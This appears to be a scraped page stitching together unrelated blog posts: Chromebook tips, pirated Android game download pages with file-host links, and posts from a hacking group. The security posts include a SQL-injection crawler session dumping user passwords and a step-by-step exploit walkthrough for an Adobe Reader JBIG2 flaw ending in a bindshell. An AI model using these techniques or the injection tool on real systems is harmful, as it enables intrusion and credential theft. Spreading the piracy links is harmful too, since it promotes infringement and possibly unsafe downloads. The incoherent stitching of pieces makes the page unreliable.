vncviewer

however, since there are no close window widgets, there's two ways to disconnect.. either navigate to the vnc server icon once connected, and tell it to disconnect you. or, kill it from the terminal.
Also, in theory, you should be able to link the java plugin to the browser plugins directory, and get java working in browser, however it doesn't work for me, and I'm not sure why at the moment.

It's got shortcomings, but it's a start.

Making /mnt/stateful_partition exec friendly

To contact us Click HERE
Finally found out how to make the /mnt/stateful_partition exec permission persistant.
open up a shell CTRL-ALT-Tshellsudo suopen up /sbin/chromeos_startup - i'll use nano, as I have a tutorial for installing itnano /sbin/chromeos_startup
Now, when scrolling around in nano, the screen will not refresh properly when scrolling up/down pages, but, we can press CTRL-L to make it redraw the screen
While in nano, CTRL-C will give you you're current cursor position. We want to edit lines 51, 58, and 67.
Remove noexec, from each of those lines
The line should then look something like .... -o nodev,nosuid .....
You can also remove the ,nosuid if you'll be wanting to install and SUID programs on the stateful partition.

Save the file by pressing CTRL-X and answering Y and pressing enter for the filename.
Reboot, and your stateful partition should be remounted with the correct options from this point forward.

Ambient Light Sensor

To contact us Click HERE
It seems the features will never cease. The CR48's got a ambient light sensor in it as well, located just to the right of the webcam's eye.
If your display brightness isn't cranked all the way up, and you come into an area of increased light (or presumably walk outside) the display will brighten up for you.
Don't believe me? Turn the screen brightness down in a dim room, and hit the webcam with a flashlight!

About: Pages

To contact us Click HERE
For awhile now, we've known we could go to the address about:version or about:flags and get more information or different settings.

I've found theirs an in depth listing of these pages at about:about

List of About pages

• about:appcache-internals
• about:blob-internals
• about:view-http-cache
• about:credits
• about:dns
• about:flags
• about:gpu
• about:histograms
• about:memory
• about:net-internals
• about:plugins
• about:stats
• about:sync
• about:tasks
• about:tcmalloc
• about:terms
• about:version
• about:linux-proxy-config
• about:sandbox
• about:network
• about:os-credits

For Debug

The following pages are for debugging purposes only. Because they crash or hang the renderer, they're not linked directly; you can type them into the address bar if you need them.

• about:crash
• about:hang
• about:shorthang
• about:gpucrash
• about:gpuhang

Be warned however, about:sync has been crashing my browser, however it works fine on my other PC.

Proxy Settings

To contact us Click HERE
One of my biggest gripes so far with the CR48, is waiting for it to detect proxy settings anytime the wifi reconnects. Every time it comes out of suspend, it takes way to long to discover I'm not (and never) use a proxy, before it will let me do anything online.

I was unable to find a place in the settings where I could change this, but I stumbled across chrome://settings/proxy which lets you default it to direct connection!

Now my chromebook works a lot faster coming out of standby and getting back on the net!

CarDust 1.1 APK

To contact us Click HERE

CarDust v1.1 APK Free 4shared Mediafire Download Android

Requirements: Android 2.2 and up
Overview: Leave 'em in the dust!


From desolate wastelands to abandoned post-industrial suburbia, tire-burning dust eaters come together to risk life and limb in the CarDust challenge. Glory, riches and frequent oil changes await you on these CarDust v1.1 APK Free 4shared Mediafire Download Android inhospitable tracks!

androidzoom.com: Entertaining and challenging. Recommendable. 4/5 (Great App)
Compete with these hard-boiled veterans in multiple locations to win the CarDust Tournament. Test your mettle in six battered, bizarre, age-old vehicles trying to cross the finish line in front of all others. Employ unusual, highly experimental (and probably illegal) technologies to gain an edge on your opponents! Race against the ghosts of the past - either CarDust v1.1 APK Free 4shared Mediafire Download Android yours or those of other racers (through OpenFeint).

This package includes, among others:
- five peculiar vehicles remotely resembling cars (plus an unlockable sixth vehicle!)
- five richly featured 3D tracks - desolate desert, abandoned factory, outback town, ruined dockyard and mountain ridge (plus an unlockable sixth track!)
- never-seen-before time warp and CarDust v1.1 APK Free 4shared Mediafire Download Android position switching powerups
- two casual race modes: QuickRace with up to 5 AI opponents, and TimeTrial enabling you to race your own “ghost” - or compete against world's best driver
- Big Tournament mode: race on four different tracks and score the most points to unlock extra content
- over 30 achievements waiting to be unlocked (including a very special secret achievement!)
- full OpenFeint integration with leaderboards and TimeTrial “ghost competition” with the best player currently out there!

CarDust v1.1 APK Free 4shared Mediafire Download Android

Download here

http://1hostclick.com/2mjwmfie6kjl/CarDust_v1.1.apk.html

Direct Download

http://rapidgator.net/file/22940756/CarDust_v1.1.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

Grabatron 1.5.4 APK

To contact us Click HERE

Grabatron v1.5.4 APK Free 4shared Mediafire Download Android

Requirements: Android v2.1+
Overview: Grabatron is the latest massively addicting game from the makers of Hungry Shark.

Crazy high replay value, Future Games Of London has delivered one of the best action games in the AppStore- App Shack 4.5/5
This game makes me laugh the Grabatron v1.5.4 APK Free 4shared Mediafire Download Android whole time I am playing. - AndroidRundown.com 10/10 PERFECT!

** Massive JUNE Update **
+ 5 Ships: Scout, Mustax, Hornet, Talonator and XenoClaw!
+ 5 Landing Zones!
+ Ship Upgrades: Speed, Shield, Crystal Attraction!
+ Extra Lives!

Grabatron is the latest massively addictive game from the makers of Hungry Shark.

Take control of a UFO with a Grabatron v1.5.4 APK Free 4shared Mediafire Download Android retractable claw and destroy the puny humans!
Terrorise them anyway you like: Toss them, crush them, abduct them - it's up to you.

Explore a huge and varied environment with hours of action packed gameplay.

* Beautiful Graphics
* Realistic Physics
* Huge world to explore
* Over 30 different missions
* Both Tilt and Touch controls available

Grabatron - where being evil has never been so much fun...



NOTE:
HTC Desire, Nexus One, Galaxy Ace users: Pause and resume the game if you experience slowdown issues 5-10mins into gameplay.

Recent changes:
v1.5.4: Special weapon - Alien Homing Missiles!
+ Earn Crystals by watching video ads!
+ special something for Independence Day!
Grabatron v1.5.4 APK Free 4shared Mediafire Download Android

Download here

http://rapidapk.com/3vy8y0gerbmm

Direct Download

http://rapidgator.net/file/22929929

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

Critter Quitter: Bugs Revenge 1.0.1 APK

To contact us Click HERE

Critter Quitter: Bugs Revenge v1.0.1 Free 4shared Mediafire Download Android

Requirements: Android 2.2 and up
Overview: Critter Quitter - Stop an invasion of ravenous bugs! A "killer" Android game.




Call them berserker bugs, call them insatiable insects, call them pernicious pests, call them whatever you want but DON'T call them to dinner! These critters are on the loose and about to eat you out of house and home!

These critters are clever and cunning Critter Quitter: Bugs Revenge v1.0.1 Free 4shared Mediafire Download Android and will use every trick to get at your delicious pizzas, cakes, pies and assorted goodies. The only way to stop these critters is to bash, squish, and squash them into oblivion.

But you won’t have to do it alone. Each critter kill earns you juice and you can trade that juice for an assortment or wacky and wonderful, but dastardly and deadly weapons. Use these weapons or “power-ups” to defeat these invasive critters. And with such a wide variety of power-ups at your disposal, no two plays are ever the same.

Show the world what an efficient critter killing machine you truly are! Critter Quitter proudly uses OpenFeint, so you can unlock fun achievements, shoot for the top of the global Leaderboards, and challenge Critter Quitter: Bugs Revenge v1.0.1 Free 4shared Mediafire Download Android your friends - all while racking up points.

Critter Quitter offers you addictive gameplay, spectacular graphics, and two game modes!

FEATURES

★ 54 "Killer" Levels, increasing in difficulty. First 18 are free to play!
★ 20 Species of Crazy Carnivorous Critters
★ 14 Ingenious Power-ups for Clever Critter Killing
★ Combo System to Maximize Your Score
★ Easy to Learn, Tough to Master - Great for ALL Ages and Experience Levels
★ Slick Animations and Immersive Sounds Effects
★ "Go for Broke" Survival Mode for Ultimate Challenge


Critter Quitter: Bugs Revenge v1.0.1 Free 4shared Mediafire Download Android

Download here

http://turbobit.net/zqtzwjaktoib.html

Direct Download

http://www.rodfile.com/rq7tbnw7jjlg/Critter_Quitter.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

Omega Hero 1.1 APK

To contact us Click HERE

Omega Hero v1.1 APK Free 4shared Mediafire Download Android

Requirements: Android 2.0.1 and up
Overview: Play as a protector of the innocent, born to defend small businesses from large corporate takeovers in a side scrolling 3D brawler.


In a city that never sweeps, you take control of Omega Hero in a mission to clean the streets of the rotten Dust Bunnies and their evil employer Mr. Boss.

★ Easy to learn, Omega Hero v1.1 APK Free 4shared Mediafire Download Android exciting to play and challenging to master! ★

★★★★★This game has a ton of humor and even more fun.
-Chad Coup, Arcani Pictures, LLC

★★★★★There's finally a mobile beat 'em up that's actually fun.
-Kyle Davis, Integrity Financial Group

★★★★★Old school gameplay with amazing graphics.-Justin Murphy, Full Sail University



Features
✓ 6 unique acts
✓ Endless mode for Omega Hero v1.1 APK Free 4shared Mediafire Download Android unlimited play
✓ Free content updates
✓ Original soundtrack by Shinobi MC
✓ Fully voice acted
✓ Hard mode for the ultimate challenge
✓ Game Center achievements and leader boards
Omega Hero v1.1 APK Free 4shared Mediafire Download Android

Download here

http://1hostclick.com/rvzv0d2tzgi1/Omega_Hero_v1.1.apk.html

Direct Download

http://rapidgator.net/file/22920010/Omega_Hero_v1.1.apk.html

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

Men In Black 3 :1.0.3 AdFree APK

To contact us Click HERE

Men In Black 3 :v1.0.3 AdFree APK Free 4shared Mediafire Download Android

Requirements: Android v2.1+
Overview: The official game of Men in Black 3, putting players in charge of the agency.

CREATE AND MANAGE YOUR OWN MIB AGENCY
• Train your agents and assign them to missions
• Access a wide range of MIB weapons and gadgets like the Neuralyzer, the Deatomizer and the infamous Noisy Cricket.
• Build dozens of different Men In Black 3 :v1.0.3 AdFree APK Free 4shared Mediafire Download Android rooms to upgrade your weapons and develop your agency.

TAKE DOWN ENEMIES IN 1969 & 2012 NEW YORK
• Travel in time to fight aliens in different areas of New York including Brooklyn, Times Square, and Central Park
• Utilize your agent’s futuristic weapons and equipment
• Meet dozens of aliens faithfully inspired by the Men in Black universe

ASK YOUR FRIENDS TO JOIN THE Men In Black 3 :v1.0.3 AdFree APK Free 4shared Mediafire Download Android AGENCY
• Invite your friends from GL LIVE! & Facebook to play
• Ask for your friends’ help during fights to defeat powerful aliens
• Visit your friends’ headquarters and get rewarded for lending a hand


MEN IN BLACK™ 3, in theaters May 25th, 2012. In Men in Black 3, Agents J and K are back... in time. J has seen some inexplicable things in his 15 years with the Men in Black, but nothing, not even aliens, perplexes him as much as his wry, reticent partner. But when K's life and the fate of the planet are at stake, Agent J will have to travel back in time to put things right. J discovers that there are secrets to the universe that K never told him -- secrets that will reveal themselves as he teams up with the young Agent K to save his partner, the agency, and the future of humankind.


Latest version: 1.0.3 (for Android version 2.1 and higher, supports App2SD)
Men In Black 3 :v1.0.3 AdFree APK Free 4shared Mediafire Download Android

Download here

http://rapidgator.net/file/22900422

Direct Download

http://rapidapk.com/l7223sqypqr6

Download link

Instructions for mediafire Free Links before these

Demo video on how to installAdvertisementClose to play

MS09-001 followup - Just DoS bugs?

It appears that the 3 vulnerabilities convered in MS09-001 due not lead to code execution. We spent the last few days really tearing into these and could not produce any conditions that were controllable that would lead to code execution. The ANDX bug had already been determined to be simply a DOS but it was thought that the NTTRANS/TRANS2 bugs could lead to code execution. Opon further review, we found that in the case of both bugs, a buffer underflow could be caused in which a buffer would be allocated with not enough memory which would later be zeroed out later in the SMB processing functions of transaction requests. It was here that the now corrupted system heap pool would crash in srv.sys during a pool-bugcheck. The crashs can actually be triggered a number of ways - leading to a similiar crash - just with different origins. Were still looking into possible avenues of taversing the MPX functionality but as for now... code execution does not look possible.

Think the group will try to spend some time this week looking at other possible vulnerable functionality in SMB. Seems like there is alot of room for error.

-xort

MsSQL SQL Injection Data Crawling - Tool Updated

We've recently updated the functionality of the sqlidiscover.pl tool used for enumerating sql databases, tables, columns and data fields. We've included support for adding a custom cookies to your request.

http://blacksecurity.org/tools/42/sqlidiscover___MsSQL_SQL_Injection_Data_Crawler/124.html



sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
usage: sqlidiscover [-G|-P] [-v] [-b] [-phostname:port] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL

-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vuln/file.asp
-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN



Here's an actual example:

jinxy ~ # perl sqlidiscover.pl -c ASPSESSIONIDSSSTRCDB:KCMLJILCJGPBJELANCFHCNGL -v -G -iProductID http://www.example.com/catalog/view.asp
sqli_discover_tables v0.2 26Jan2009 kaneda 'n phildo, upgraded by redsand.
[*] HTTP cookie set to ASPSESSIONIDSSSTRCDB=KCMLJILCJGPBJELANCFHCNGL
[*] URL to process: http://www.example.com/catalog/view.asp
[*] Abusing 'ProductID'...

[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo


unknown_db.test> help
sqliinjection interactive session help

exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).

------------------------------------------------------------

unknown_db.test> select database demo
Changing context to demo.test

demo.test> select table Users

Changing context to demo.Users

demo.Users> discover columns

[*] Enumerating columns for table Users
[+] Column search: found: (0) AccountNumber
[+] Column search: found: (1) Address
[+] Column search: found: (2) Email
[+] Column search: found: (3) Name
[+] Column search: found: (4) Password
[+] Column search: found: (5) Phone
[+] Column search: found: (6) Username
[+] Column search finished, 6 found


demo.Users> fetch Username, Password, Name
[+] Using columns Username, Password, Name
[*] Retrieving information for table demo.Users
[+] 3 columns selected for data retrieval
| Username | Password | Name
| admin | demo | Demo
| superadmin | master | Master Admin

Blinded w/ VNC Viewer vulns.

Well, a few things to report here in the blackbl0gs. Firstly, I've spent the past few days looking into/writing exploits for these recent VNC viewer vulns in the RFB protocol. The first vulnerability affects Real VNC viewer <=4.1.2 (CVE-2008-4770). This vulnerability is triggered when incorrect information is passed to CMsgReader::readRect() which can lead to an integer underflow in allocation space. The remaining data in the packet following the allocation size is then copied into the buffer allocated on the stack leading to an SEH overwrite. The second vulnerability which were currently looking into accurately exploiting is a vulnerability in TightVNC <=1.3.9 (CVE-2009-0388). In this vulnerability malicious data can be passed to a Tvnc subfunction in which a null byte overwrite can be triggered via a integer over/underflow @ HeapPointer + ControllableValue. Lotsa fun other hacks going in the priv8 arena.

ttfn, -xort

Adobe Acrobat/Reader Universal Exploit : APSB09-01 (aka CVE-2009-0658)

Hey gang,
Been a few days since our last post, but not to worry! Still lots of fun stuff happening in the blacksec community. Our latest post is a brief analysis of the jbig2 vulnerability recently patched by Adobe in APSB09-01 (aka CVE-2009-0658). What I thought was particularly interesting (although not a surprising given vendors actual understanding of the vulnerabilities that typically affect their software) was its classification: "Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat". The actual bug stems from a pointer-indexing issue when utilizing a specifically crafted JBIG2 structure.

Bugs like this are fun, because they can often lead to multiple different avenues that inturn can be leveraged for execution. We were able to gain control of execution through the use of some careful heap spraying that would both create 1/2 a sprayed area of pointers that are later loaded and used in a controlled write operation followed by another 1/2 of your typical nopsled/shellcode heapspraying. Combine this spraying with the time used to allocate the memory being used and

you could easily overwrite low-addressed (static) module entry points. Theres a little more too this, so lets dig in...

Lets begin with the orignal crash mentioned in the snort VRT blog posting (http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html). From the posting:

"the 5th byte into the stream (which is the segment header flag byte) were to have the 6th bit set indicating a large page association size:

00 00 00 01 40 00 00 33 33 33"

Here, we can see the beginning of our long road to exploitation. After modifying the segment header flag of our JBIG2 stream, we are able to embed a controllable (big endian!) pointer beginning at the 2nd byte following the the segment header flag. Using the values described in the original advisory, we can trigger a crash at the first (0387298A - Add operation) location as seen below.

03872979 |. 8B41 1C MOV EAX,DWORD PTR DS:[ECX+1C]
; our (big endian) pointer gets loaded into EAX
0387297C |. 85C0 TEST EAX,EAX
0387297E |. 0F84 AC020000 JE Acroba_1.03872C30
03872984 |. 8B4E 10 MOV ECX,DWORD PTR DS:[ESI+10]
; The base-index register gets loaded into ECX
03872987 |. 8D0480 LEA EAX,DWORD PTR DS:[EAX+EAX*4]
; EAX gets multiplied by 5
0387298A |. 834481 EC 01 ADD DWORD PTR DS:[ECX+EAX*4-14],1
; ECX+ EAX*4 - the value at this location gets incremented.

Here ECX varies in its exact location but, generally lands in the ~02xxxxxx range. If we craft some generic heap spraying code, we can allocate blocks of memory within a specified distance of this pointer. So, after adding the heap spraying code we can see a nice area of memory that gets allocated 0x082xxxxx-0x0fexxxxx bytes (or 0x6200000 to 0xDE00000 bytes away). This area is located after Cooltype and before acaptuse in memory. If we look back at the assembly from the first crash area we can see our pointer gets multiplied by 5 first and then multiplied by 4 again in the following operation (you'll see below this same logic is repeated in the second crash). Applying this logic, if we use a value such as 0x00666666, it will first be multiplied by 5 to give us 0x01FFFFFE and then multiplied by 4 again to finally equal 0x07FFFFF8. This drops us right in the middle of our first large heap sprayed area and allows us to continue on to the second crash location.

03872BC7 |> 8B0CBB /MOV ECX,DWORD PTR DS:[EBX+EDI*4]
03872BCA |. 8B41 1C |MOV EAX,DWORD PTR DS:[ECX+1C]
; our (big endian) pointer gets loaded into EAX
03872BCD |. 8B56 10 |MOV EDX,DWORD PTR DS:[ESI+10]
; EDX points to the same base we used before in ECX
03872BD0 |. 8D0480 |LEA EAX,DWORD PTR DS:[EAX+EAX*4]
; EAX gets multiplied by 5
03872BD3 |. 8D4482 EC |LEA EAX,DWORD PTR DS:[EDX+EAX*4-14]
; the address of where we performed our last ADD at the first crash location gets
; loaded into EAX
03872BD7 |. 8B50 04 |MOV EDX,DWORD PTR DS:[EAX+4]
; HEAPSPRAY_AREA+0x4 gets loaded into EDX
03872BDA |. 85D2 |TEST EDX,EDX
; make sure this isn't 0!
03872BDC |. 74 0A |JE SHORT Acroba_1.03872BE8
03872BDE |. 8B68 10 |MOV EBP,DWORD PTR DS:[EAX+10]
; HEAPSPRAY_AREA+0x10 gets loaded into EBX
03872BE1 |. 890CAA |MOV DWORD PTR DS:[EDX+EBP*4],ECX
; a pointer to our struct gets written to anywhere we want

Here, we crash at the second location with the values EDX and EBX equaling 0x90909090. Basically, we can overwrite any portion of (writable) memory with a pointer to our struct. We accomplish this by making the first 100-300 of our heap spray operations (of typically 1000) with [x][y][x][y][x][y][x][y] style alternating pointers where x is the value we want to overwrite and y is 0 (used in EBX*4). Other values can be used here but you get the general idea.

Lets focus now on whats at the pointer were able to write to anywhere in memory.

This is our stream from our file:

stream.....@.........,...H...........
73 74 72 65 61 6D 0A [00000001] 40 00 00666666 [13000007] 2C 00 00 09

Certain bytes have been separated and put into brackets to help visualize their exact locations when loaded into memory.

When the second crash occurs ECX points to the following memory data:

010B60F0 [01 00 00 00]00 62 01 00 00 00 2F 44 00 00 75 6D
....b
.../D..um
010B6100 00 00 00 00 25 32 30 61 6E 64 25 32 F4 FF FF FF ....%20and%2ôÿÿÿ
010B6110 [07 00 00 13]00 00 72 75 62 D0 A2 01 0C 6B BA 00 ....rubÃ�¢
.kº.


As you can see, we control the 2 (little endian) pointers at [ECX] and [ECX+0x20] and can place whatever values we wish at these locations by manipulating the stream in our malformed pdf. Our Solution was to simply place a "CALL [ECX+0x20]" at the first location where we land at (after overwriting a called pointer) and to stick where ever we want to land at [ECX+0x20] (or right after our index pointer in our jbig2 stream).

So, what to overwrite? We spent a day or two looking for static areas of memory that were to be accessed after the crash that would lead to execution. In the end, we decided to take advantage of the Module Entry point of kernel32 located in the 0x00251xxx range. These locations will vary based on SP/pdf you have created but after a little math can be statically calculated.

00251FD8 7C800000 kernel32.7C800000
00251FDC 7C80B63E kernel32. ; <- what we clobber!
00251FE0 000F6000
00251FE4 00420040 Acrobat.00420040
00251FE8 00251F70 UNICODE "C:\WINDOWS\system32\kernel32.dll"
00251FEC 001A0018
00251FF0 00251F98 UNICODE "kernel32.dll"
00251FF4 80084004

This is called not to long after our heap spraying has completed and our overwrite has succeeded. This leaves only one last step, to toss your fav high mem address into ECX+0x20. We chose to use something simple, 0x13131313 - which lands in the second portion of our heap spraying code. This technique works both on acrobat/reader 9 with the same offsets :D:D:D. One, two, twenty-three, four...adobe bindshell landing at your door.

C:\Documents and Settings\Administrator\Desktop> telnet localhost 5500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>


Bindshell Exploit

- xort & redsand

Str0ke @ Milworm's Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

:o(

rip str0ke

Extract %date% in Batch Programming

Hi Friends,

One very annoying problems is extracting date & time using batch programming.
The reason is simple!
Try c:\>echo %date% on Windows 2003 Server v/s Windows 2000 Server
Windows 2000 Server Output: Sun 06/13/2010
Windows 2003 Server Output: 06/13/2010

You will see that both the output are different & that is a cause of big headache. When i write any administrative scripts for taking log backups with appropriate date, it is very important for me that such platform differences should not make my batch scripts to fail on either of the platform.

Thus, this let me out find a generic solution which will always extract correct date for me no matter its Windows 2000 Server or Window 2003 Server as the underlying platform!

My earlier way to extract date was like this:
@set date_temp=%date:~4,2%%date:~7,2%%date:~10,4%
This use to give me output as

Windows 2000 Server Output: 06132010
Windows 2003 Server Output: 3/01

As you can clearly see that my approach fails on Windows 2003 Server platform. I have the option to modify & setup my date extraction as per Windows 2003 Server platform, but that would make it fail on Windows 2000 Server :-(
So how to find that all in one code?

Well, its simple! Just have a glance at the below code:


Above code will always return you the correct date regardless of the underlying platform. It works correctly because its logic is based on the delimiter "-"
I was relieved that, atleast the delimiter is common across all the Windows Versions :-)

I hope this helps you in your batch or DOS programming :-D
If you have similar issues for extracting %time%, checkout how to extract %time%!

Keywords:
how to extract %date%, extract %date%, batch script, batch scripting, batch program, windows scripting, windows scripts, DOS, Windows 2000 Server, Windows 2003 Server, %date%, echo, etcRelated Posts : Misc Info,Programming